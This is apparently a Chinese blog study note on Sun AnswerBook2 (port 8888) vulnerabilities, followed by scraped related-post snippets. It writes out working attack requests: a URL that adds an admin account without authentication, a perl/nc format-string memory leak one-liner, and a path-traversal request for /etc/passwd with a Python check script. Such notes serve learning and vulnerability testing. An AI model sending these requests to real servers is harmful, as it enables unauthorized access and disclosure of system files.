AnswerBook2(端口8888)相关漏洞
AnswerBook简介
AnswerBook2 产品是 Sun 在线文档系统。它是一个基于客户服务器的系统,客户是任何一个 HTML 3.2-compliant 网络浏览器,而服务器是一个基于 httpd 的网络服务器。您可以在一个中央文档服务器或本地服务器上安装 AnswerBook2 文档集合。
AnswerBook2 管理特性
1、用客户服务器结构,您能将文档存储于一个单一位置(服务器)而从用户桌面(客户)访问。
2、提供命令行接口(ab2admin)和一个基于浏览器的界面(AnswerBook2 管理页),以便执行服务器管理功能。
3、能作为一个 CGI 进程在不同的网络服务器上运行。
4、通过打开或关上 AnswerBook2 调试功能,您能控制是否将错误用一个红色的 “BUG”,可见地显示给用户。
5、包括服务器访问和错误的记录文件。
AnswerBook2 零部件
AnswerBook2产品包括以下单元:
1、文档服务器-向客户浏览器执行查询功能并"服务 “文档。包括一个为查看及打印文档提供普通"查看并感觉"的模板;并提供网络浏览器和命令行管理界面,此界面执行数据库、口令鉴别和其它管理功能。
2、文档集合-可以是新的(SGML)文档或旧的( 显示附言TM)文档。有关在您的服务器上安装文档集合的信息,请参阅"安装文件集合”。
3、用户网络浏览器-用户能用任何 HTML 3.2-compliant 浏览器查阅文档。有关查阅文档的信息,请参阅使用 AnswerBook2 系统查看联机文档 - zh。 为了使用户能访问文档服务器,您需用联合命名服务(FNS)登记服务器或用户需知服务器的 URL。
AnswerBook2漏洞
1、未授权访问
受影响版本:Sun-AnswerBook2 1.2-1.4.2
攻击测试手段
http://服务器ip:8888/ab2/@AdminViewError访问错误日志
http://服务器ip:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar添加账户(密码)
2、远程格式化字符串漏洞
原理:理解printf()函数 和 %n
printf()输出函数
sanf() 输入函数
%n:输出%n之前字符的个数
正常的C语言代码如下,输出为5
#include <bits/stdc++.h>
using namespace std;
int main()
{int n=5;printf("%d",n);return 0;
}
如果把输入权限交给用户的话
#include <bits/stdc++.h>
using namespace std;
int main()
{
char a[100];
scanf("%s",a);
printf(a);
return 0;
}
如果用户输入的字符串是"%x%x%x",输出为70ec48070ec60,为内存中的数据(内存泄漏)
%x:以16进制读取数字,由于没有数字,只能将内存地址读取出来
受影响版本:Sun-AnswerBook2 1.2-1.4.2
攻击测试手段
perl -e 'print"GET /";print"%x"x20;print" HTTP/1.0\r\n\r\n\r\n"' | nc IP地址 8888造成内存地址泄露
3、任意文件读取
在请求包里发送
GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n可以看到文件内容。
参考POC:
def check(ip, port, timeout):try:socket.setdefaulttimeout(timeout)s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((ip, int(port)))flag = "GET /../../../../../../../../../etc/passwd HTTP/1.1\r\n\r\n"s.send(flag)data = s.recv(1024)s.close()if 'root:' in data and 'nobody:' in data:return u"漏洞"except:pass
以上漏洞我还没有复现,只是理解个大概,后面有机会再复现。参考链接:https://blog.csdn.net/qq_33608000/article/details/104124248
AnswerBook2(端口8888)相关漏洞相关推荐
- Docker对外开放2375端口引发安全漏洞分析与解决方案
前言 最近因为自己的云服务器开放了Docker 2375端口,导致被注入蠕虫,一直在跑挖矿程序.所以大家一定要注意外网环境下不要轻易打开此端口,如果要对外开放此端口,可以参考下面的解决方案,下面就Do ...
- kali linux安装watchdog(Watchdog是bayonet修改版)bayonet是一款src资产管理系统,从子域名、端口服务、漏洞、爬虫等一体化的资产管理系统
Watchdog bayonet是一款src资产管理系统,从子域名.端口服务.漏洞.爬虫等一体化的资产管理系统 Watchdog是bayonet修改版,重新设计了数据库及web及扫描程序 下载地址:h ...
- Redis相关漏洞记录
不是很了解Redis数据库,粗浅学了一下Redis应该是以键值对的方式存储数据的 Redis默认端口:6379 Redis相关操作 连接远程服务器: redis-cli -h [目标IP] -p [端 ...
- SpringBoot相关漏洞
以下文章来源方志朋的博客,回复"666"获面试宝典 本文是 Spring Boot 相关漏洞的学习资源,仅作为安全研究和授权测试使用,不要用于非法活动. 这个GitHub项目从信息 ...
- php_rce-攻防世界-web-ThinkPHP版本5的相关漏洞
题目是ThinkPHP版本5的相关漏洞 ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞. s=index/think ...
- linux里centos7开放端口,linux centos7 防火墙及端口开放相关命令
一.防火墙相关命令 1.查看防火墙状态 : systemctl status firewalld.service 注:active是绿的running表示防火墙开启 2.关闭防火墙 :systemct ...
- iOS 8.1.2 越狱过程详解及相关漏洞分析
360NirvanTeam · 2016/01/10 12:35 Author:[email protected] 0x00 简介 本文主要介绍了: 自己对越狱的理解 iOS 8.1.2 越狱工具的工 ...
- linux防火墙开放所有端口命令,linux centos7 防火墙及端口开放相关命令
一.防火墙相关命令 1.查看防火墙状态 : systemctl status firewalld.service 注:active是绿的running表示防火墙开启 2.关闭防火墙 :systemct ...
- 关于CPU相关漏洞的修复处理
问题描述 2018年1月,谷歌Project Zero公布了现代处理器存在安全漏洞Spectre与Meltdown. Spectre攻击利用的是处理器的分支猜测和高速缓存技术.在执行指令的过程中,当遇 ...
- OpenSSL相关漏洞
目录 心脏出血漏洞(CVE-2014-0160) OpenSSL CCS注入漏洞(CVE-2014-0224) OpenSSL FREAK Attack漏洞(CVE-2015-0204) TLS/SS ...
最新文章
- 总结:被MySQL UTF8编码坑的惨痛教训...
- LInux找不到动态链接库,./cyusb_linux: error while loading shared libraries: libcyusb.so: cannot open shared
- 怎么拆计算机主机,技术编辑教您电脑机箱怎么拆
- python json模块详解_Python的标准模块包json详解
- 提现接口网站 php,API提现接口
- leetcode 旋转数组
- limit实现原理 mysql_解读数据库:深入分析MySQL中事务以及MVCC的实现原理
- android平板电脑系统安装程序,安卓平板电脑系统重装图解教程
- c语言编程的头文件是什么,C语言头文件到底是什么?
- 【转】MapGIS基础系列(三)--服务疑难面面观
- 汽车CAN总线入门,通俗易懂
- 计算机竞赛制作机器人,2016全国中小学电脑制作比赛机器人灭火竞赛规则
- Python课第3周:平方根格式化
- 1、u3d 下载、安装
- web.config与mysql的连接 appsettings_Web.config配置文件中定义了如下数据库连接串
- 办公技巧——PPT添加页码
- 微信支付V3-SDK(已发布npm)
- Linux环境下——实现xml文件解析
- Delphi 2010安装及使用UniDAC安装和使用
- 安卓银行木马新增“keylogger”功能,攻击能力倍增